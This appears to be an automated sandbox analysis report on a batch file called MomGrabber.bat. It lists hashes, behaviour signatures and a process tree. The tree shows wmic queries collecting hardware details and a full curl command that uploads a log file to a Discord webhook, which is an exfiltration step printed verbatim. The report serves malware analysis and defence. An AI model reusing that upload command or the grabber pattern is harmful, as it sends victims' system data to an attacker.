Analysis

  • max time kernel
    139s
  • max time network
    124s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-08-2024 13:14

General

  • Target

    MomGrabber.bat

  • Size

    727B

  • MD5

    8691d8696a4b87bab23b707f6c9a9fa7

  • SHA1

    fc34c04ffd8ba2d8e4b4240fb5125bfe9ec8f455

  • SHA256

    c372a7a932e36fe62d705e40061a72c8f7420188707c9317c88d149181cd4b03

  • SHA512

    716ea20bd8f8f32fea0356742ea277ede9136df27fb893bf11551db781d03aa3de2c900b437d50b1081f99592bfbecab4b2a5d849d0a6e1608c7e78a68f028a9

Score
6/10

Malware Config

Signatures

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Delays execution with timeout.exe 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\MomGrabber.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2380
    • C:\Windows\System32\Wbem\WMIC.exe
      wmic diskdrive get /format:list
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3872
    • C:\Windows\System32\Wbem\WMIC.exe
      wmic baseboard get /format:list
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2504
    • C:\Windows\System32\Wbem\WMIC.exe
      wmic bios get /format:list
      2⤵
        PID:2644
      • C:\Windows\system32\curl.exe
        curl -H "Content-Type: multipart/form-data" -F "file=@C:\Users\Admin\AppData\Local\Temp\22186-25730-25642.log" https://discord.com/api/webhooks/1255258727809024114/-QCsZFpQpBHxOspyB3JkzE8_amtIEhu33Ah6-9ogfXbIoIujLtJZrqWKK-2EBRcm_UZs
        2⤵
          PID:4304
        • C:\Windows\system32\timeout.exe
          timeout 1 /nobreak
          2⤵
          • Delays execution with timeout.exe
          PID:3936

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\22186-25730-25642.log

        Filesize

        276KB

        MD5

        6c0a823a01240be989c2b4eb5d54e0f2

        SHA1

        24253b6a85d05beaa32c45dbbcdb252a95a45e80

        SHA256

        8424ef8abf3c08cd184703ac00359dbd595cc7bb506651b4990f56e4c9e2b9e3

        SHA512

        105b1d57f72b17734bb3dc2a67f0694957ade3192730ef2a3d7c4be8a9a75da7d82c43bf7bb9fca156683efd888fd0dbfca56e8b1bb7e734f89cdca15ea477eb